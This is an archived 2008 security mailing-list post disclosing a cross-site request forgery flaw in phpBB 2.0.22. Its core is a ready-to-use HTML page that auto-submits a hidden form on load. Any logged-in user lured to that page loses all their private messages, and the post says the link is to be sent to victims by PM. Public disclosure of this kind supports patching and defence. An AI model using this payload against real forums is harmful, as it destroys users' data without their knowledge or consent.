phpBB 2.0.22 Remote PM Delete XSRF Vulnerability
- From: nbbn@xxxxxxx
- Date: Wed, 23 Jan 2008 21:28:59 +0100
################################################################
phpBB 2.0.22 Remote PM Delete XSRF Vulnerability
by NBBN Type: Cross-Site Request Forgery
Founded: December 2007
################################################################
An attacker can send a link via pm to a site with the follow html code to a
victim and all victim's pm's are going to be deleted when he click the link.
######Code##########################################################
<html>
<head>
</head>
<body onLoad=javascript:document.xsrf.submit()>
<form action="http://[site]/phpBB2/privmsg.php?folder=inbox"; method="post"
name="xsrf">
<input type="hidden" name="mode" value="" />
<input type="hidden" name="deleteall" value="true" />
<input type="hidden" name="confirm" value="Yes">
</body>
</html>
#####################################################################
######Vuln Versions:#####################
I've tested it only on 2.0.22 but I think that all versions of 2 are vuln.
(Sorry my bad english :-) )
- Prev by Date: iDefense Security Advisory 01.22.08: IBM Tivoli PMfOSD HTTP Request Method Buffer Overflow Vulnerability
- Next by Date: Re: Re: PIX Privilege Escalation Vulnerability
- Previous by thread: iDefense Security Advisory 01.22.08: IBM Tivoli PMfOSD HTTP Request Method Buffer Overflow Vulnerability
- Next by thread: Pre Hotel and Resorts reservation portal login bypass
- Index(es):
